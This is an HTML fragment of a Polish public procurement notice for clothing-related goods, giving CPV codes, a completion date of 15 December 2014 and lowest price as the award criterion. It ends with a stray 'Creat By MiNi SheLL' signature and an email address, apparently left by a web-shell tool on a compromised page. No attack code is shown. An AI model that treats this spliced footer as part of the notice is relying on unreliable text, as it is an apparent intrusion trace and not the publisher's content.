<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> opis znajduje się w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.00.00.00-9, 18.10.00.00-0, 18.14.00.00-2, 18.20.00.00-1, 18.30.00.00-2, 18.40.00.00-3, 18.80.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com